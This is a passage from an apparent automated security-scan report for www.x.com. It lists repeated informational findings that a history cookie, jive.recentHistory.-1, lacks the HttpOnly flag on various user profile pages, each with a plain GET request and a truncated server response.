Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c36303039313b332c3133383538323b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.196. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.197. https://www.x.com/people/billday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.198. https://www.x.com/people/blingnation2010

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.199. https://www.x.com/people/bryngregory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.200. https://www.x.com/people/das_licht

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.201. https://www.x.com/people/dchankhour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.202. https://www.x.com/people/eferreira

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.203. https://www.x.com/people/encore

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/encore

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/encore HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c31303939373b332c3133363236393b332c31323739393b332c323839313b332c323430323b332c3133313833303b332c323032353b; Expires=Sun, 11-Sep-2011 13:52:17 GMT; Path=/
Vary: User-Agent
JP: D=147969 t=1313157137124462
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.204. https://www.x.com/people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ezimerchant/blog/2009/11/26/confusion-between-express-checkout-and-web-payments-standard HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:48 GMT; Path=/
Vary: User-Agent
JP: D=175267 t=1313157108233489
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.205. https://www.x.com/people/gazugafan

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gazugafan

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gazugafan HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.206. https://www.x.com/people/gem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.207. https://www.x.com/people/gogoeric

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.208. https://www.x.com/people/hotellina

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.209. https://www.x.com/people/iConcessionStand

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.210. https://www.x.com/people/joncas

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.211. https://www.x.com/people/lwhite2104

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.212. https://www.x.com/people/mandeheritage

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.213. https://www.x.com/people/odeskdev

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.214. https://www.x.com/people/omuleanu

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.215. https://www.x.com/people/pluto26

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.216. https://www.x.com/people/posiden5665

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.217. https://www.x.com/people/ramonmorales123

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.218. https://www.x.com/people/rizkygarut

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

4.219. https://www.x.com/people/roguereptile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/roguereptile HTTP/1.1
